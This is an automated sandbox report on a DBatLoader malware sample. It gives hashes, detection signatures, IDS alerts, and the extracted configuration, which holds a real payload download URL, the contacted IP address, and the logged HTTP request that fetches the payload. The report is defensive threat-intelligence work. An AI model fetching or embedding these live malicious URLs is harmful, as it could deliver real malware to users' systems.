Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
6BE4RDldhw.exe

Overview

General Information

Sample name:6BE4RDldhw.exe
renamed because original name is a hash value
Original sample name:04ea25c19c4f9bc7788cc78115386f2a8c0647bc23980cd57d8376fc0d1e7820.exe
Analysis ID:1562862
MD5:1a6538c76ae6ea94e5a6976adf7dbd67
SHA1:f31c769d58680d42e5c34a8119bf855fc4920060
SHA256:04ea25c19c4f9bc7788cc78115386f2a8c0647bc23980cd57d8376fc0d1e7820
Tags:doganalecmdexeuser-JAMESWT_MHT
Infos:

Detection

DBatLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected DBatLoader
AI detected suspicious sample
Allocates many large memory junks
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Machine Learning detection for sample
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic

Classification

  • System is w10x64
  • 6BE4RDldhw.exe (PID: 7796 cmdline: "C:\Users\user\Desktop\6BE4RDldhw.exe" MD5: 1A6538C76AE6EA94E5A6976ADF7DBD67)
  • cleanup
{"Download Url": ["https://taksonsdfg.co.in/2345678765432123456789876543/243_Yjnxmyasmza"]}
SourceRuleDescriptionAuthorStrings
Process Memory Space: 6BE4RDldhw.exe PID: 7796JoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
    SourceRuleDescriptionAuthorStrings
    0.2.6BE4RDldhw.exe.2e70000.2.unpackJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
      No Sigma rule has matched
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-26T08:12:11.473687+010020283713Unknown Traffic192.168.2.749702108.170.55.202443TCP
      2024-11-26T08:12:13.402767+010020283713Unknown Traffic192.168.2.749708108.170.55.202443TCP
      2024-11-26T08:12:15.703179+010020283713Unknown Traffic192.168.2.749715108.170.55.202443TCP
      2024-11-26T08:12:17.524193+010020283713Unknown Traffic192.168.2.749721108.170.55.202443TCP
      2024-11-26T08:12:19.920234+010020283713Unknown Traffic192.168.2.749728108.170.55.202443TCP
      2024-11-26T08:12:21.806763+010020283713Unknown Traffic192.168.2.749729108.170.55.202443TCP
      2024-11-26T08:12:24.073316+010020283713Unknown Traffic192.168.2.749737108.170.55.202443TCP
      2024-11-26T08:12:25.967840+010020283713Unknown Traffic192.168.2.749744108.170.55.202443TCP
      2024-11-26T08:12:28.320613+010020283713Unknown Traffic192.168.2.749752108.170.55.202443TCP
      2024-11-26T08:12:30.481324+010020283713Unknown Traffic192.168.2.749760108.170.55.202443TCP
      2024-11-26T08:12:32.876400+010020283713Unknown Traffic192.168.2.749767108.170.55.202443TCP
      2024-11-26T08:12:34.802777+010020283713Unknown Traffic192.168.2.749773108.170.55.202443TCP
      2024-11-26T08:12:37.141813+010020283713Unknown Traffic192.168.2.749780108.170.55.202443TCP
      2024-11-26T08:12:39.020661+010020283713Unknown Traffic192.168.2.749786108.170.55.202443TCP
      2024-11-26T08:12:41.309552+010020283713Unknown Traffic192.168.2.749793108.170.55.202443TCP
      2024-11-26T08:12:43.143202+010020283713Unknown Traffic192.168.2.749799108.170.55.202443TCP
      2024-11-26T08:12:45.806689+010020283713Unknown Traffic192.168.2.749806108.170.55.202443TCP
      2024-11-26T08:12:47.762699+010020283713Unknown Traffic192.168.2.749812108.170.55.202443TCP
      2024-11-26T08:12:50.115790+010020283713Unknown Traffic192.168.2.749819108.170.55.202443TCP
      2024-11-26T08:12:52.206224+010020283713Unknown Traffic192.168.2.749825108.170.55.202443TCP
      2024-11-26T08:12:54.864294+010020283713Unknown Traffic192.168.2.749832108.170.55.202443TCP
      2024-11-26T08:12:56.779735+010020283713Unknown Traffic192.168.2.749838108.170.55.202443TCP
      2024-11-26T08:12:59.051286+010020283713Unknown Traffic192.168.2.749845108.170.55.202443TCP
      2024-11-26T08:13:00.973326+010020283713Unknown Traffic192.168.2.749850108.170.55.202443TCP
      2024-11-26T08:13:03.808752+010020283713Unknown Traffic192.168.2.749858108.170.55.202443TCP
      2024-11-26T08:13:05.681335+010020283713Unknown Traffic192.168.2.749862108.170.55.202443TCP
      2024-11-26T08:13:07.999771+010020283713Unknown Traffic192.168.2.749870108.170.55.202443TCP
      2024-11-26T08:13:10.086389+010020283713Unknown Traffic192.168.2.749876108.170.55.202443TCP
      2024-11-26T08:13:12.514726+010020283713Unknown Traffic192.168.2.749883108.170.55.202443TCP
      2024-11-26T08:13:14.409317+010020283713Unknown Traffic192.168.2.749889108.170.55.202443TCP
      2024-11-26T08:13:16.873080+010020283713Unknown Traffic192.168.2.749896108.170.55.202443TCP
      2024-11-26T08:13:18.757808+010020283713Unknown Traffic192.168.2.749901108.170.55.202443TCP
      2024-11-26T08:13:21.057191+010020283713Unknown Traffic192.168.2.749908108.170.55.202443TCP
      2024-11-26T08:13:22.981249+010020283713Unknown Traffic192.168.2.749912108.170.55.202443TCP
      2024-11-26T08:13:25.303120+010020283713Unknown Traffic192.168.2.749919108.170.55.202443TCP
      2024-11-26T08:13:27.176743+010020283713Unknown Traffic192.168.2.749925108.170.55.202443TCP
      2024-11-26T08:13:29.476379+010020283713Unknown Traffic192.168.2.749931108.170.55.202443TCP
      2024-11-26T08:13:31.616873+010020283713Unknown Traffic192.168.2.749936108.170.55.202443TCP
      2024-11-26T08:13:34.158592+010020283713Unknown Traffic192.168.2.749943108.170.55.202443TCP
      2024-11-26T08:13:36.181653+010020283713Unknown Traffic192.168.2.749949108.170.55.202443TCP
      2024-11-26T08:13:38.479015+010020283713Unknown Traffic192.168.2.749956108.170.55.202443TCP
      2024-11-26T08:13:40.317916+010020283713Unknown Traffic192.168.2.749962108.170.55.202443TCP
      2024-11-26T08:13:42.565359+010020283713Unknown Traffic192.168.2.749969108.170.55.202443TCP
      2024-11-26T08:13:44.398469+010020283713Unknown Traffic192.168.2.749975108.170.55.202443TCP
      2024-11-26T08:13:46.690752+010020283713Unknown Traffic192.168.2.749982108.170.55.202443TCP
      2024-11-26T08:13:48.528390+010020283713Unknown Traffic192.168.2.749987108.170.55.202443TCP
      2024-11-26T08:13:50.843723+010020283713Unknown Traffic192.168.2.749994108.170.55.202443TCP
      2024-11-26T08:13:52.816807+010020283713Unknown Traffic192.168.2.749998108.170.55.202443TCP
      2024-11-26T08:13:55.446370+010020283713Unknown Traffic192.168.2.750007108.170.55.202443TCP
      2024-11-26T08:13:57.332730+010020283713Unknown Traffic192.168.2.750012108.170.55.202443TCP
      2024-11-26T08:13:59.711182+010020283713Unknown Traffic192.168.2.750019108.170.55.202443TCP
      2024-11-26T08:14:01.552217+010020283713Unknown Traffic192.168.2.750024108.170.55.202443TCP
      2024-11-26T08:14:03.797752+010020283713Unknown Traffic192.168.2.750031108.170.55.202443TCP
      2024-11-26T08:14:05.871190+010020283713Unknown Traffic192.168.2.750033108.170.55.202443TCP
      2024-11-26T08:14:08.509134+010020283713Unknown Traffic192.168.2.750042108.170.55.202443TCP
      2024-11-26T08:14:10.501709+010020283713Unknown Traffic192.168.2.750046108.170.55.202443TCP
      2024-11-26T08:14:13.037106+010020283713Unknown Traffic192.168.2.750052108.170.55.202443TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: 6BE4RDldhw.exeAvira: detected
      Source: https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgiAvira URL Cloud: Label: phishing
      Source: https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgi:Avira URL Cloud: Label: phishing
      Source: https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgi8Avira URL Cloud: Label: phishing
      Source: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi43/243_YjnxmyasmzaIbAvira URL Cloud: Label: phishing
      Source: https://taksonsdfg.co.in/05Avira URL Cloud: Label: phishing
      Source: https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgiDASYCAvira URL Cloud: Label: phishing
      Source: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi43/243_YjnxmyasmzaAvira URL Cloud: Label: phishing
      Source: https://taksonsdfg.co.in:443/2345678765432123456789876543/243_YjnxmyasmzaXAvira URL Cloud: Label: phishing
      Source: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgiqrAvira URL Cloud: Label: phishing
      Source: https://taksonsdfg.co.in/9r6kAvira URL Cloud: Label: phishing
      Source: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgiLocationETagAuthentication-InfoAgeAccept-RangesLasAvira URL Cloud: Label: phishing
      Source: https://taksonsdfg.co.in/HAvira URL Cloud: Label: phishing
      Source: https://taksonsdfg.co.in/234567876543212PAvira URL Cloud: Label: phishing
      Source: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgiAvira URL Cloud: Label: phishing
      Source: https://taksonsdfg.co.in/2345678765432121$Avira URL Cloud: Label: phishing
      Source: https://taksonsdfg.co.in:443/2345678765432123456789876543/243_Yjnxmyasmza0uAvira URL Cloud: Label: phishing
      Source: https://taksonsdfg.co.in/2345678765432123456789876543/243_YjnxmyasmzaaqAvira URL Cloud: Label: phishing
      Source: https://taksonsdfg.co.in/yrAvira URL Cloud: Label: phishing
      Source: https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgi43/243_Yjnxmyasmza0uAvira URL Cloud: Label: phishing
      Source: https://taksonsdfg.co.in/1rAvira URL Cloud: Label: phishing
      Source: https://taksonsdfg.co.in/2345678765432123456789876543/243_YjnxmyasmzakbAvira URL Cloud: Label: phishing
      Source: https://taksonsdfg.co.in:443/2345678765432123456789876543/243_YjnxmyasmzaAvira URL Cloud: Label: phishing
      Source: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi43/243_YjnxmyasmzaqbAvira URL Cloud: Label: phishing
      Source: https://taksonsdfg.co.in/)rAvira URL Cloud: Label: phishing
      Source: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgimAvira URL Cloud: Label: phishing
      Source: https://taksonsdfg.co.in/2345678765432123456789876543/243_YjnxmyasmzakAvira URL Cloud: Label: phishing
      Source: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgig3okAvira URL Cloud: Label: phishing
      Source: https://taksonsdfg.co.in/2345678765432123456789876543/243_YjnxmyasmzaAvira URL Cloud: Label: malware
      Source: https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgi$Avira URL Cloud: Label: phishing
      Source: https://taksonsdfg.co.in/cgi-sAvira URL Cloud: Label: phishing
      Source: https://taksonsdfg.co.in/QuAvira URL Cloud: Label: phishing
      Source: https://taksonsdfg.co.in/QrAvira URL Cloud: Label: phishing
      Source: https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgi1Content-LengthAllowWarningViaUpgradeTransfer-Avira URL Cloud: Label: phishing
      Source: https://taksonsdfg.co.in/IrAvira URL Cloud: Label: phishing
      Source: https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgi43/243_YjnxmyasmzaAvira URL Cloud: Label: phishing
      Source: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgiLocationETagAuthentication-InfoAgeAccept-RAvira URL Cloud: Label: phishing
      Source: https://taksonsdfg.co.in/ArAvira URL Cloud: Label: phishing
      Source: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi)rAvira URL Cloud: Label: phishing
      Source: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi43/243_YjnxmyasmzaCbAvira URL Cloud: Label: phishing
      Source: https://taksonsdfg.co.in/2345678765432123456789876543/243_Yjnxmyasmza8Avira URL Cloud: Label: phishing
      Source: https://taksonsdfg.co.in/2345678765432123456789876543/243_Yjnxmyasmza7Avira URL Cloud: Label: phishing
      Source: https://taksonsdfg.co.in/234567876543212aAvira URL Cloud: Label: phishing
      Source: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi43/243_Yjnxmyasmza-bRkAvira URL Cloud: Label: phishing
      Source: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi43/243_YjnxmyasmzakbAvira URL Cloud: Label: phishing
      Source: https://taksonsdfg.co.in/Avira URL Cloud: Label: phishing
      Source: https://taksonsdfg.co.in/4Avira URL Cloud: Label: phishing
      Source: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi4Avira URL Cloud: Label: phishing
      Source: https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgiPAvira URL Cloud: Label: phishing
      Source: https://taksonsdfg.co.in/iuAvira URL Cloud: Label: phishing
      Source: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgiU3Avira URL Cloud: Label: phishing
      Source: https://taksonsdfg.co.in/234567876543212Avira URL Cloud: Label: phishing
      Source: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi$Avira URL Cloud: Label: phishing
      Source: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi43/243_YjnxmyasmzaWbAvira URL Cloud: Label: phishing
      Source: https://taksonsdfg.co.in/2345678765432123456789876543/243_Yjnxmyasmza$Avira URL Cloud: Label: phishing
      Source: https://taksonsdfg.co.inAvira URL Cloud: Label: phishing
      Source: https://taksonsdfg.co.in/2345678765432123456789876543/243_Yjnxmyasmza#Avira URL Cloud: Label: malware
      Source: 6BE4RDldhw.exeMalware Configuration Extractor: DBatLoader {"Download Url": ["https://taksonsdfg.co.in/2345678765432123456789876543/243_Yjnxmyasmza"]}
      Source: taksonsdfg.co.inVirustotal: Detection: 12%Perma Link
      Source: 6BE4RDldhw.exeReversingLabs: Detection: 65%
      Source: 6BE4RDldhw.exeVirustotal: Detection: 67%Perma Link
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
      Source: 6BE4RDldhw.exeJoe Sandbox ML: detected
      Source: 6BE4RDldhw.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49702 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49715 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49728 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49737 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49752 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49767 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49780 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49793 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49806 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49819 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49832 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49845 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49858 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49870 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49883 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49896 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49908 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49919 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49931 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49943 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49956 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49969 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49982 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49994 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:50007 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:50019 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:50031 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:50042 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:50052 version: TLS 1.2
      Source: Binary string: easinvoker.pdb source: 6BE4RDldhw.exe, 6BE4RDldhw.exe, 00000000.00000003.1333153403.000000007FC10000.00000004.00001000.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000002.2582071460.00000000023C6000.00000004.00001000.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1333810883.000000007F8A0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: easinvoker.pdbGCTL source: 6BE4RDldhw.exe, 00000000.00000003.1333153403.000000007FC10000.00000004.00001000.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1333431137.0000000002CB6000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000002.2582071460.00000000023C6000.00000004.00001000.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1333810883.000000007F8A0000.00000004.00001000.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000002.2583380707.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeCode function: 0_2_02E75908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_02E75908

      Networking

      barindex
      Source: Malware configuration extractorURLs: https://taksonsdfg.co.in/2345678765432123456789876543/243_Yjnxmyasmza
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeCode function: 0_2_02E8E4B4 InternetCheckConnectionA,0_2_02E8E4B4
      Source: Joe Sandbox ViewIP Address: 108.170.55.202 108.170.55.202
      Source: Joe Sandbox ViewASN Name: SSASN2US SSASN2US
      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49708 -> 108.170.55.202:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49737 -> 108.170.55.202:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49728 -> 108.170.55.202:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49767 -> 108.170.55.202:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49744 -> 108.170.55.202:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49773 -> 108.170.55.202:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49715 -> 108.170.55.202:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49752 -> 108.170.55.202:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49721 -> 108.170.55.202:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49702 -> 108.170.55.202:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49760 -> 108.170.55.202:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49729 -> 108.170.55.202:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49786 -> 108.170.55.202:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49799 -> 108.170.55.202:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49780 -> 108.170.55.202:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49793 -> 108.170.55.202:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49806 -> 108.170.55.202:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49812 -> 108.170.55.202:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49819 -> 108.170.55.202:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49825 -> 108.170.55.202:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49832 -> 108.170.55.202:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49838 -> 108.170.55.202:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49850 -> 108.170.55.202:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49858 -> 108.170.55.202:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49870 -> 108.170.55.202:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49876 -> 108.170.55.202:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49862 -> 108.170.55.202:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49845 -> 108.170.55.202:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49889 -> 108.170.55.202:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49883 -> 108.170.55.202:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49896 -> 108.170.55.202:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49901 -> 108.170.55.202:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49912 -> 108.170.55.202:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49908 -> 108.170.55.202:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49925 -> 108.170.55.202:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49931 -> 108.170.55.202:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49936 -> 108.170.55.202:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49919 -> 108.170.55.202:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49943 -> 108.170.55.202:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49949 -> 108.170.55.202:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49962 -> 108.170.55.202:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49956 -> 108.170.55.202:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49969 -> 108.170.55.202:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49975 -> 108.170.55.202:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49982 -> 108.170.55.202:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49987 -> 108.170.55.202:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49994 -> 108.170.55.202:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49998 -> 108.170.55.202:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50007 -> 108.170.55.202:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50012 -> 108.170.55.202:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50019 -> 108.170.55.202:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50024 -> 108.170.55.202:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50031 -> 108.170.55.202:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50033 -> 108.170.55.202:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50042 -> 108.170.55.202:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50046 -> 108.170.55.202:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50052 -> 108.170.55.202:443
      Source: global trafficHTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
